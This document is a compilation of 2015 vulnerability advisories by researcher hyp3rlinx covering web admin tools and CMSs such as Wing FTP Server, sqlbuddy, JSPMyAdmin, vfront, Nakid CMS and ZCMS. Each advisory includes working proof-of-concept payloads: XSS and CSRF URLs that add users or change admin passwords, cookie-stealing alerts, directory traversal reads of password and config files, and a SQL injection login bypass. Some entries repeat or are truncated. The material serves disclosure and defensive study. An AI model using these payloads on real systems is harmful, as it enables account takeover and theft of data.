CSRF & XSS Wing FTP Server Admin <= v4.4.5
Wing FTP Server Admin 4.4.5 - CSRF & Cross Site Scripting Vulnerabilities
Release Date:
=
2015-04-28
Source:
http://hyp3rlinx.altervista.org/advisories/AS-WFTP0328.txt
Common Vulnerability Scoring System:
Overall CVSS Score 8.9
Product:
===
Wing FTP Server is a Web based administration FTP client that supports
following protocols FTP, FTPS, HTTPS, SSH
Advisory Information:
==
CSRF & client-side cross site scripting web vulnerability within Wing FTP
Server Admin that allows adding arbitrary users to the system.
Vulnerability Disclosure Timeline:
==
March 28, 2015: Vendor Notification
March 28, 2015: Vendor Response/Feedback
April 19, 2015: Vendor Notification
April 28, 2015: Vendor released new version 4.4.6
April 28, 2015: Public Disclosure - John Page
Affected Product(s):
Wing FTP Server Admin 4.4.5
Product: Wing FTP Server - Admin
Exploitation Technique:
===
Remote
Severity Level:
===
High
Technical Details & Description:
Request Method(s):
[+] POST & GET
Vulnerable Product:
[+] Wing FTP Server Admin <= 4.4.5
Vulnerable Parameter(s):
[+] domain & type
Affected Area(s):
[+] Server Admin
Proof of Concept (POC):
===
The CSRF and client-side cross site scripting web vulnerability can be
exploited by remote attackers without privileged application user account and
with low user interaction (click). Payload will add arbitrary users to the
system.
PoC: Example
http://localhost:5466/admin_loglist.html?domain=[CSRF & XSS VULNERABILITIES]
POC: Add arbitrary user:
http://localhost:5466/admin_loglist.html?domain=%3Cscript%3EajaxRequest%28%27admin_adduser%27,%22domain%3dtest%26user%3d{%27username%27%3a%27hyp3rlinx%27,%27password%27%3a%27kuQrwgV%27,%27oldpassword%27%3a%27%27,%27max_download%27%3a%270%27,%27max_upload%27%3a%270%27,%27max_download_account%27%3a%270%27,%27max_upload_account%27%3a%270%27,%27max_connection%27%3a%270%27,%27connect_timeout%27%3a%275%27,%27idle_timeout%27%3a%275%27,%27connect_per_ip%27%3a%270%27,%27pass_length%27%3a%270%27,%27show_hidden_file%27%3a0,%27change_pass%27%3a0,%27send_message%27%3a0,%27ratio_credit%27%3a%270%27,%27ratio_download%27%3a%271%27,%27ratio_upload%27%3a%271%27,%27ratio_count_method%27%3a0,%27enable_ratio%27%3a0,%27current_quota%27%3a%270%27,%27max_quota%27%3a%270%27,%27enable_quota%27%3a0,%27note_name%27%3a%27%27,%27note_address%27%3a%27%27,%27note_zip%27%3a%27%27,%27note_phone%27%3a%27%27,%27note_fax%27%3a%27%27,%27note_email%27%3a%27%27,%27note_memo%27%3a%27%27,%27ipmasks%27%3a[],%27filemas
ks%27%3a[],%27directories%27%3a[],%27usergroups%27%3a[],%27subdir_perm%27%3a[],%27enable_schedule%27%3a0,%27schedules%27%3a[],%27limit_reset_type%27%3a%270%27,%27limit_enable_upload%27%3a0,%27cur_upload_size%27%3a%270%27,%27max_upload_size%27%3a%270%27,%27limit_enable_download%27%3a0,%27cur_download_size%27%3a%270%27,%27max_download_size%27%3a%270%27,%27enable_expire%27%3a0,%27expiretime%27%3a%272015-05-18%2021%3a17%3a46%27,%27protocol_type%27%3a63,%27enable_password%27%3a1,%27enable_account%27%3a1,%27ssh_pubkey_path%27%3a%27%27,%27enable_ssh_pubkey_auth%27%3a0,%27ssh_auth_method%27%3a0}%22,%20%22post%22%29%3C/script%3E
POC XSS:
http://localhost:5466/admin_viewstatus.html?domain=[XSS VECTOR]
POC XSS:
http://localhost:5466/admin_event_list.html?type=[XSS VECTOR]
Solution - Fix & Patch:
===
Vendor released updated version 4.4.6 Fix/Patch (Wing FTP Server)
Security Risk:
==
The security risk of the CSRF client-side cross site scripting web
vulnerability in the `domain` admin_loglist.html value has CVSS Score of 8.9
Credits & Authors:
==
John Page ( hyp3rlinx ) @apparitionsec
Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any
warranty. the security research reporter John Page disclaims all warranties,
either expressed or implied, including the warranties of merchantability and
capability for a particular purpose. apparitionsec or its suppliers are not
liable in any case of damage, including direct, indirect, incidental,
consequential loss of business profits or special damages.
Domains: hyp3rlinx.altervista.org
Sqlbuddy Directory Traversal Read Arbitrary Files Vulnerability
Sqlbuddy Directory Traversal Read Arbitrary Files Vulnerability. Vendor: http://www.sqlbuddy.com Release Date: = 05-08-2015 Source: http://hyp3rlinx.altervista.org/advisories/AS-SQLBUDDY0508.txt Product: === sqlbuddy version 1.3.3 SQL Buddy is an open source web based MySQL administration application. Advisory Information: == sqlbuddy suffers from directory traversal whereby a user can move about directories an read any PHP and non PHP files by appending the '#' hash character when requesting files via URLs. e.g. .doc, .txt, .xml, .conf, .sql etc... After adding the '#' character as a delimiter any non PHP will be returned and rendered by subverting the .php concatenation used by sqlbuddy when requesting PHP pages via POST method. Normal sqlbuddy request: http://localhost/sqlbuddy/home.php?ajaxRequest=666&requestKey= POC exploit payloads: === 1-Read from Apache restricted directory under htdocs: http://localhost/sqlbuddy/#page=../../../restricted/user_pwd.sql# 2-Read any arbitrary files that do not have .PHP extensions: http://localhost/sqlbuddy/#page=../../../directory/sensitive-file.conf# 3-Read phpinfo (no need for '#' as phpinfo is a PHP file): http://localhost/sectest/sqlbuddy/sqlbuddy/#page=../../../../xampp/phpinfo Disclosure Timeline: == Vendor Notification N/A May 8, 2015: Public Disclosure - hyp3rlinx Exploitation Technique: === Create a test file with non .php extension in some htdocs directory then request the page in the browser. http://localhost/sqlbuddy/sqlbuddy/#page=../../../test.txt# Severity Level: === High Description: == Request Method(s): [+] POST Vulnerable Product: [+] sqlbuddy 1.3.3 Vulnerable Parameter(s): [+] #page=somefile Affected Area(s): [+] Server directories & sensitive files Solution - Fix & Patch: === N/A Credits: John Page ( hyp3rlinx ) Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. the security research reporter John Page disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. apparitionsec or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages. Domains: hyp3rlinx.altervista.org
Sidu 5.2 Admin XSS Vulnerability
Affected Vendor: www.topnew.net/sidu/ Credits: John Page ( hyp3rlinx ) Domains: hyp3rlinx.altervista.org Source: http://hyp3rlinx.altervista.org/advisories/AS-SIDU0513.txt Product: Sidu version 5.2 is a web based database front-end administration tool. Advisory Information: = Sidu 5.2 is vulnerable to cross site scripting attacks. Exploit code: == http://localhost/sidu52/sql.php?id=1&sql=%27%27%3Cscript%3Ealert%28%22XSS%20By%20hyp3rlinx%20\n05112015\n%22%2bdocument.cookie%29%3C/script%3E Disclosure Timeline: == Vendor Notification May 12, 2015 May 13, 2015: Public Disclosure Severity Level: === High Description: Request Method(s): [+] GET Vulnerable Product: [+] Sidu 5.2 Vulnerable Parameter(s): [+] sql=[XSS] Affected Area(s): [+] Admin of currently logged in user. == (hyp3rlinx)
DbNinja 3.2.6 Flash XSS Vulnerabilities
# Exploit Title: DbNinja Flash XSS Exploit # Google Dork: intitle: Flash XSS # Date: May 27, 2015 # Exploit Author: John Page (hyp3rlinx) # Website: hyp3rlinx.altervista.org # Vendor Homepage: www.dbninja.com # Software Link: www.dbninja.com # Version: 3.2.6 # Tested on: Windows 7 # Category: Flash XSS # CVE : NA Source: http://hyp3rlinx.altervista.org/advisories/AS-DBNINJA0527.txt Product: DbNinja is a web based application for MySQL database administration. Advisory Information: DbNinja multiple Flash based XSS vulnerabilities Vulnerability Details: = The DbNinja Flash uploader component contains 2 SWF files that use Flash 'ExternalInterface' API to call Javascript functions. These SWFs can be exploited by supplying malicious code as parameters to those functions from the URL. The text value "Copy to Clipboard" can also be changed using the "buttonText" parameter. Exploit code(s): === 1- http://localhost/dbninja/dbninja/js/lib/uploader.swf?selectCallback=alert(document.cookie) 2- http://localhost/dbninja/dbninja/js/lib/clipboard.swf?buttonText=DbNinja%20Login&dataSourceFunc=alert(document.cookie) 3- http://localhost/dbninja/dbninja/js/lib/clipboard.swf?completeCallback=alert(document.cookie) Disclosure Timeline: = Vendor Notification May 23, 2015 May 27, 2015: Public Disclosure Severity Level: = High Description: == Request Method(s): [+] GET Vulnerable Product: [+] DBNinja 3.2.6 Vulnerable Parameter(s): [+] selectCallback, dataSourceFunc & completeCallback Affected Area(s): [+] uploader.swf, clipboard.swf === (hyp3rlinx)
DbNinja 3.2.6 Flash XSS Vulnerabilities
# Exploit Title: DbNinja Flash XSS Exploit # Google Dork: intitle: Flash XSS # Date: May 27, 2015 # Exploit Author: John Page (hyp3rlinx) # Website: hyp3rlinx.altervista.org # Vendor Homepage: www.dbninja.com # Software Link: www.dbninja.com # Version: 3.2.6 # Tested on: Windows 7 # Category: Flash XSS # CVE : NA Source: http://hyp3rlinx.altervista.org/advisories/AS-DBNINJA0527.txt Product: DbNinja is a web based application for MySQL database administration. Advisory Information: DbNinja multiple Flash based XSS vulnerabilities Vulnerability Details: = The DbNinja Flash uploader component contains 2 SWF files that use Flash 'ExternalInterface' API to call Javascript functions. These SWFs can be exploited by supplying malicious code as parameters to those functions from the URL. The text value "Copy to Clipboard" can also be changed using the "buttonText" parameter. Exploit code(s): === 1- http://localhost/dbninja/dbninja/js/lib/uploader.swf?selectCallback=alert(document.cookie) 2- http://localhost/dbninja/dbninja/js/lib/clipboard.swf?buttonText=DbNinja%20Login&dataSourceFunc=alert(document.cookie) 3- http://localhost/dbninja/dbninja/js/lib/clipboard.swf?completeCallback=alert(document.cookie) Disclosure Timeline: = Vendor Notification May 23, 2015 May 27, 2015: Public Disclosure Severity Level: = High Description: == Request Method(s): [+] GET Vulnerable Product: [+] DBNinja 3.2.6 Vulnerable Parameter(s): [+] selectCallback, dataSourceFunc & completeCallback Affected Area(s): [+] uploader.swf, clipboard.swf === (hyp3rlinx)
JSPMyAdmin SQL Injection, CSRF & XSS Vulnerabilities
Credits: John Page ( hyp3rlinx )
Domains: hyp3rlinx.altervista.org
Source:
http://hyp3rlinx.altervista.org/advisories/AS-JSPMYADMIN0529.txt
Vendor:
code.google.com/p/jsp-myadmin
Product:
JSPAdmin 1.1 is a Java web based MySQL database management system.
Advisory Information:
JSPMyAdmin 1.1 SQL Injection, CSRF & XSS Vulnerabilities
SQL Injection
CSRF
XSS
Vulnerability Details:
=
SQL Injection:
deletedata.jsp is supposed to delete 1 field per query, yet we can control the
SQL and build an OR condition.
Problem is application uses concatenated user input to build SQL statements
even though paramaterized queries are used.
In deletedata.jsp we find the following code:
con.prepareStatement("DELETE FROM " + table + " WHERE "+ field + "='" + val
+"'");
So expected SQL to be run is this deleting 1 record.
e.g.
http://localhost:8081/JSPMyAdmin/deletedata.jsp?db=test&table=email&field=CATID&val=7
But the SQL Injection vulnerability lets us instead drop all fields using an
SQL 'OR' statement.
e.g.
http://localhost:8081/JSPMyAdmin/deletedata.jsp?db=test&table=email&field=CATID
or 'field'='NAME'
*
CSRF:
We can drop any database by sending victim malicious linx as there is no CSRF
token used.
*
XSS:
There is zero user input checks allowing remote attackers to execute arbitrary
scripts in the
context of an authenticated user's browser session.
***
Exploit code(s):
===
SQL Injection POC:
--
So expected SQL to be run is this deleting 1 record
http://localhost:8081/JSPMyAdmin/deletedata.jsp?db=test&table=email&field=CATID&val=7
http://localhost:8081/JSPMyAdmin/deletedata.jsp?db=test&table=email&field=CATID
or 'field'='NAME'
CSRF POC:
-
http://127.0.0.1:8081/JSPMyAdmin/drop.jsp?db=mydb
XSS(s) POC:
--
1- alert('XSS By hyp3rlinx');
Using POST method in 'host' parameter of login page.
http://127.0.0.1:8081/JSPMyAdmin/
2-
http://127.0.0.1:8081/JSPMyAdmin/right.jsp?server=localhost&db="/>alert(666)
3-
http://127.0.0.1:8081/JSPMyAdmin/right.jsp?server="/>alert(666)&db=
4-
http://127.0.0.1:8081/JSPMyAdmin/tabledata.jsp?db="/>alert(666);
5-
http://127.0.0.1:8081/JSPMyAdmin/tabledata.jsp?server=localhost&db=mysql&table="/>alert(666);
6-
http://127.0.0.1:8081/JSPMyAdmin/tabledata.jsp?server="/>alert(666);&db=
7-
http://127.0.0.1:8081/JSPMyAdmin/query.jsp?server="/>alert(666)&db=
8-
http://127.0.0.1:8081/JSPMyAdmin/export.jsp?db=test&table=alert(666)
Disclosure Timeline:
=
Vendor Notification: NA
May 29, 2015: Public Disclosure
Severity Level:
=
High
Description:
==
Request Method(s):
[+] GET / POST
Vulnerable Product:
[+] JSPMyAdmin 1.1
Vulnerable Parameter(s):
[+] host, server, db, table
Affected Area(s):
[+] Entire admin
===
(hyp3rlinx)
Enhanced SQL Portal 5.0.7961 XSS Vulnerability
[+] Credits: John Page ( hyp3rlinx ) [+] Domains: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-ENHSQLPORTAL0602.txt Vendor: www.eliacom.com www.eliacom.com/mysql-gui-download.php Product: Enhanced SQL Portal 5.0.7961 web based MySQL administration application. Advisory Information: Enhanced SQL Portal 5.0.7961 XSS Vulnerability Vulnerability Details: = iframe.php contains an XSS vulnerability Exploit code(s): === http://localhost/Enhanced_SQL_Portal_5.0.7961_05_06_2015/iframe.php?id="/>alert(666) Disclosure Timeline: = Vendor Notification: May 28, 2015 June 2, 2015 : Public Disclosure Severity Level: = Med Description: == Request Method(s): [+] GET Vulnerable Product: [+] Enhanced SQL Portal 5.0.7961 Vulnerable Parameter(s): [+] id Affected Area(s): [+] iframe === (hyp3rlinx)
vfront-0.99.2 CSRF & Persistent XSS
[+] Credits: John Page ( hyp3rlinx )
[+] Domains: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-VFRONT0602.txt
Vendor:
==
www.vfront.org
Product:
===
vfront-0.99.2 is a PHP web based MySQL & PostgreSQL database management
application.
Advisory Information:
CSRF, Persistent XSS & reflected XSS
Vulnerability Detail(s):
===
CSRF:
=
No CSRF token in place, therefore we can add arbitrary users to the system.
Persistent XSS:
variabili.php has multiple XSS vectors using POST method, one input field
'altezza_iframe_tabella_gid' will store XSS payload
into the MySQL database which will be run each time variabili.php is accessed
from victims browser.
Persisted XSS stored in MySQL DB:
=
DB-> vfront_vfront
TABLE-> variabili
COLUMN--> valore (will contain our XSS)
Exploit code(s):
===
CSRF code add arbitrary users to system:
===
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/log.php?op="/>var
xhr%3dnew
XMLHttpRequest();xhr.onreadystatechange%3dfunction(){if(xhr.status%3d%3d200){if(xhr.readyState%3d%3d4){alert(xhr.responseText);}}};xhr.open('POST','utenze.db.php?insert_new',true);xhr.setRequestHeader('Content-type','application/x-www-form-urlencoded');xhr.send('nome%3dhyp3rlinxe%26cognome%3dapparitionsec%26email%...@x.com%26passwd%3dhacked%26passwd1%3dhacked');&tabella=&uid=&data_dal=All&data_al=All
Persistent XSS:
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/variabili.php?feed=0&gidfocus=0
Inject XSS into 'the altezza_iframe_tabella_gid' input field to store in
database.
"/>alert(666)
Reflected XSS(s):
=
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/query_editor.php?id=&id_table=&id_campo="/>alert(666)
XSS vulnerable input fields:
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/variabili.php
altezza_iframe_tabella_gid <- ( Persistent XSS )
passo_avanzamento_veloce_gid
n_record_tabella_gid
search_limit_results_gid
max_tempo_edit_gid
home_redirect_gid
formati_attach_gid
default_group_ext_gid
cron_days_min_gid
Disclosure Timeline:
===
Vendor Notification: May 31, 2015
June 2, 2015 : Public Disclosure
Severity Level:
===
High
Description:
==
Request Method(s):
[+] GET & POST
Vulnerable Product:
[+] vfront-0.99.2
Vulnerable Parameter(s):
[+] altezza_iframe_tabella_gid
passo_avanzamento_veloce_gid
n_record_tabella_gid
search_limit_results_gid
max_tempo_edit_gid
home_redirect_gid
formati_attach_gid
default_group_ext_gid
cron_days_min_gid
id_campo
op
Affected Area(s): [+] Admin & MySQL DB
===
(hyp3rlinx)
Symphony CMS 2.6.2
[+] Credits: John Page ( hyp3rlinx ) [+] Domains: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-SYMPHONY0606.txt Vendor: www.getsymphony.com/download/ Product: Symphony CMS 2.6.2 Advisory Information: Symphony CMS XSS Vulnerability Vulnerability Details: = The 'sort' parameter used by author search in Admin is XSS exploitable. Symphony seems to escape injected strings e.g. 'HELL' becomes \'HELL\' but we can easily defeat that using Javascript functions charCodeAt() & fromCharCode() e.g. String.fromCharCode(72,69,76,76) Now we can output our 'HELL' strings, construct URLs etc... Exploit XSS code(s): http://localhost/symphony-2.6.2/symphony/system/authors/?sort=alert(String.fromCharCode(72,69,76,76))&order=asc Disclosure Timeline: = Vendor Notification: June 5, 2015 June 6, : Public Disclosure Severity Level: = Med Description: == Request Method(s): [+] GET Vulnerable Product: [+] Symphony CMS 2.6.2 Vulnerable Parameter(s): [+] sort Affected Area(s): [+] symphony/system/authors/ === (hyp3rlinx)
Symphony CMS XSS Vulnerability
[+] Credits: John Page ( hyp3rlinx ) [+] Domains: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/ Vendor: http://www.silverstripe.org/software/download Product: SilverStripe CMS & Framework v3.1.13 Advisory Information: Unvalidated redirect & XSS vulnerabilities Vulnerability Details: = Unvalidated redirect XSS (reflected): Exploit code(s): === Unvalidated redirect POC: -- http://localhost/SilverStripe-cms-v3.1.13/dev/build?returnURL=[EVIL REMOTE FILE LOCATION] XSS(s) POC: -- Disclosure Timeline: = Vendor Notification: June 7, 2015 : Public Disclosure Severity Level: = High Description: == Request Method(s): [+] GET & POST Vulnerable Product:[+] SilverStripe CMS & Framework v3.1.13 Vulnerable Parameter(s): [+] Affected Area(s): [+] === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. (hyp3rlinx)
Symphony CMS XSS Vulnerability [Corrected Post]
[Correction] of Vendor Info for Symphony CMS XSS Vulnerability POST on (Jun 08) = [+] Credits: John Page ( hyp3rlinx ) [+] Domains: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-SYMPHONY0606.txt Vendor: www.getsymphony.com/download/ Product: Symphony CMS 2.6.2 Advisory Information: Symphony CMS XSS Vulnerability Vulnerability Details: = The 'sort' parameter used by author search in Admin is XSS exploitable. Symphony seems to escape injected strings e.g. 'HELL' becomes \'HELL\' but we can easily defeat that using Javascript functions charCodeAt() & fromCharCode() e.g. String.fromCharCode(72,69,76,76) Now we can output our 'HELL' strings, construct URLs etc... Exploit XSS code(s): http://localhost/symphony-2.6.2/symphony/system/authors/?sort=alert(String.fromCharCode(72,69,76,76))&order=asc Disclosure Timeline: = Vendor Notification: June 5, 2015 June 6, : Public Disclosure Severity Level: = Med Description: == Request Method(s): [+] GET Vulnerable Product: [+] Symphony CMS 2.6.2 Vulnerable Parameter(s): [+] sort Affected Area(s): [+] symphony/system/authors/ === (hyp3rlinx)
SilverStripe CMS Unvalidated Redirect & XSS vulnerabilities
[+] Credits: hyp3rlinx [+] Domains: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-SILVERSTRIPE0607.txt Vendor: http://www.silverstripe.org/software/download Product: SilverStripe CMS & Framework v3.1.13 Advisory Information: === Unvalidated redirect & XSS vulnerabilities Vulnerability Details: = Unvalidated redirect: The 'returnURL' parameter for following URL: http://localhost/SilverStripe-cms-v3.1.13/dev/build is open to abuse by supplying an malicious a location or file. XSS (reflected): install.php is XSS vulnerable using POST method for the following input fields. admin_username admin_password Exploit code(s): === Unvalidated redirect POC: http://localhost/SilverStripe-cms-v3.1.13/dev/build?returnURL=[EVIL REMOTE FILE LOCATION] XSS POC: http://localhost/SilverStripe-cms-v3.1.13/install.php admin_username admin_password ">alert(666) Disclosure Timeline: === Vendor Notification: June 7, 2015 June 8, 2015 : Public Disclosure Severity Level: === Med Description: === Request Method(s): [+] GET & POST Vulnerable Product:[+] SilverStripe CMS & Framework v3.1.13 Vulnerable Parameter(s): [+] returnURL, admin_username & admin_password Affected Area(s): [+] install & dev === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. (hyp3rlinx)
SilverStripe CMS Unvalidated Redirect & XSS vulnerabilities
[+] Credits: hyp3rlinx [+] Domains: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-SILVERSTRIPE0607.txt Vendor: http://www.silverstripe.org/software/download Product: SilverStripe CMS & Framework v3.1.13 Advisory Information: === Unvalidated redirect & XSS vulnerabilities Vulnerability Details: = Unvalidated redirect: The 'returnURL' parameter for following URL: http://localhost/SilverStripe-cms-v3.1.13/dev/build is open to abuse by supplying an malicious a location or file. XSS (reflected): install.php is XSS vulnerable using POST method for the following input fields. admin_username admin_password Exploit code(s): === Unvalidated redirect POC: http://localhost/SilverStripe-cms-v3.1.13/dev/build?returnURL=[EVIL REMOTE FILE LOCATION] XSS POC: http://localhost/SilverStripe-cms-v3.1.13/install.php admin_username admin_password ">alert(666) Disclosure Timeline: === Vendor Notification: June 7, 2015 June 8, 2015 : Public Disclosure Severity Level: === Med Description: === Request Method(s): [+] GET & POST Vulnerable Product:[+] SilverStripe CMS & Framework v3.1.13 Vulnerable Parameter(s): [+] returnURL, admin_username & admin_password Affected Area(s): [+] install & dev === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. (hyp3rlinx)
Nakid-CMS CSRF, Persistent XSS & LFI
[+] Credits: John Page ( hyp3rlinx )
[+] Domains: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-NAKIDCMS0611.txt
Vendor:
http://kilrizzy.github.io/Nakid-CMS/
Product:
kilrizzy-Nakid-CMS-f274624
Nakid CMS is an open source content management system built using PHP and
CodeIgniter.
Setup mode:
==
Under root dir for Nakid CMS we set to production mode instead of development
in index.php.
e.g. define('ENVIRONMENT', 'production');
Advisory Information:
CSRF, Persistent XSS & Auth bypass LFI
Vulnerability Details:
=
Multiple CSRF(s) exist:
We have ability to do the following as no CSRF tokens are present.
1-Change Admin password
2-Add arbitrary users to system
3-Alter system settings
XSS (persistent):
XSS parameter vulnerabilities exist for the following:
payloads will be stored in the MySQL database and activated when a victim
visits the vulnerable webpage.
XSS URL:
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/users
On the "Edit Record" pop up dialog box.
Vulnerable parameters:
-
username
password
email
fname
lname
XSS URL:
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/settings
On the "Edit Record" pop up dialog box.
Vulnerable parameters:
-
from_name
include_path
primary_email
from_email
XSS URL:
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/content_edit/1
Vulnerable parameter:
title
Authentication bypass LFI:
Local file inclusion to bypass access controls and read aribitrary files exist
by setting '$url' PHP variable on following URL
index.php/connector$url
Exploit POC code(s):
CSRF(s):
Condition:
Pursuade victim to visit our webpage or click our link, if they have a session
then we do our CSRF!.
1- Add arbitrary user to system
function doit(){
var e=document.getElementById('ruinurlife')
e.submit()
}
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/grid/users";
method="post">
2-Change Admin password
function doit(){
var e=document.getElementById('ruinurlife')
e.submit()
}
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/profile";
method="post">
3-Alter system settings
---
function doit(){
var e=document.getElementById('ruinurlife')
e.submit()
}
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/grid/settings";
method="post">
XSS persistent POC code:
===
Inject alert(666) into any of the following vulnerable fields
described above using POST method.
Need to highlight a row then click edit dialog box to edit settings.
e.g.
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/settings
from_name <--- alert(666)
include_path
primary_email
from_email
Authorization bypass LFI:
1- Logout, create a hell.txt file or whatever and put in 'htdocs' or web root,
then visit the URL (change to suit your environment).
2-
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/connector$url=../../../../../../../hell.txt
OR try
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/connector$url=../../../../../../xampp/phpinfo.php
Disclosure Timeline:
=
Vendor Notification: NA
June 11, 2015 : Public Disclosure
Severity Level:
=
High
Description:
==
Request Method(s): [+] GET & POST
Vulnerable Product:[+] kilrizzy-Nakid-CMS-f274624
Vulnerable Parameter(s): [+]
username
password
email
fname
lname
from_name
include_path
primary_email
from_email
title
connector$url
Affected Area(s): [+] /system/users
/system/profile
/system/content_edit/
===
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and that due credit is given.
Permission i
ZCMS SQL Injection & Persistent XSS
[+] Credits: John Page ( hyp3rlinx )
[+] Domains: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-ZCMS0612.txt
Vendor:
=
http://zencherry.com/
http://sourceforge.net/projects/zencherrycms
Product:
==
ZCMS 1.1 JavaServer Pages Content Management System
Advisory Information:
==
SQL Injection & Persistent XSS
Vulnerability Details:
==
SQL Injection:
Login to admin area requires a password but is easily bypassed using classic
SQLInjection method because application uses concatenated user input to
construct SQL queries.
ZCMS exploitable admin login code:
==
squerry="SELECT COUNT(username) AS usercount FROM "+TABLE_PREFIX+"users WHERE
status = 0 AND username = '"+username+"' AND password =
'"+request.getParameter("pass") +"' AND type = 1 ;";
So we just supply an Admin password like ---> HELL' OR '2'='2
which will resolve as true!
SQL Inject XSS Payload:
===
We can also inject persisten XSS payload directly to MySQL database subverting
all character filtering leveraging existing SQLInjection vulnerabilities.
Persistent XSS:
===
Another persistent XSS vector is here in author field for comments:
http://localhost:8081/ZCMS_1.1/ZCMS_1.1/index.jsp?dir=editpost&p=[page number]
Exploit code(s):
===
1) Bypass admin login
-
localhost:8081/ZCMS_1.1/ZCMS_1.1/?dir=login
Enter 'admin' for username field
Enter HELL' OR '2'='2 for the pass field
2) Inject XSS using SQL Injection
-
http://localhost:8081/ZCMS_1.1/ZCMS_1.1/?dir=editpost&p=1&title=";alert(1)
&content=alert(1)&author=alert(1)
SATAN&visibility=1&type=1&comm=0
3) Persistent XSS field
---
http://localhost:8081/ZCMS_1.1/ZCMS_1.1/index.jsp?dir=editpost&p=[page number]
Inject alert(666) in author input field.
Disclosure Timeline:
=
Vendor Notification: NA
June 12, 2015 : Public Disclosure
Severity Level:
=
High
Description:
==
Request Method(s): [+] GET & POST
Vulnerable Product:[+] ZCMS_1.1
Vulnerable Parameter(s): [+] pass, title, content, author
Affected Area(s): [+] Admin, CMS
===
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided
that
it is not altered except by reformatting it, and that due credit is given.
Permission is
explicitly given for insertion in vulnerability databases and similar, provided
that
due credit is given to the author. The author is not responsible for any misuse
of the
information contained herein and prohibits any malicious use of all security
related
information or exploits by the author or elsewhere.
(hyp3rlinx)
mysql-lite-administrator XSS vulnerabilities
[+] Credits: hyp3rlinx [+] Domains: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-MYSQLLITEADMINISTRATOR0621.txt Vendor: = code.google.com/p/mysql-lite-administrator Product: == mysql-lite-administrator(beta1) Advisory Information: == Multiple XSS vulnerabilities Vulnerability Details: == mysql-lite-administrator is vulnerable to XSS attacks, the application escapes injected strings. e.g. 'HELL' becomes \'HELL\' but we can easily defeat that using Javascript functions String.charCodeAt() & String.fromCharCode() XSS Exploit code(s): http://localhost/mysql-lite-administrator(beta1)/tabella.php?table_name=alert(String.fromCharCode(72,69,76,76)) http://localhost/mysql-lite-administrator(beta1)/coloni.php?num_row=1&table_name=alert(666) http://localhost/mysql-lite-administrator(beta1)/coloni.php?num_row=">alert(String.fromCharCode(72,69,76,76)) http://localhost/mysql-lite-administrator(beta1)/insert.php?table_name=alert(666) Disclosure Timeline: = Vendor Notification: NA June 21, 2015 : Public Disclosure Severity Level: = Med Description: == Request Method(s): [+] GET Vulnerable Product:[+] mysql-lite-administrator (beta1) Vulnerable Parameter(s): [+] table_name, num_row Affected Area(s): [+] tabella.php & coloni.php === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. (hyp3rlinx)
mysql-lite-administrator XSS vulnerabilities
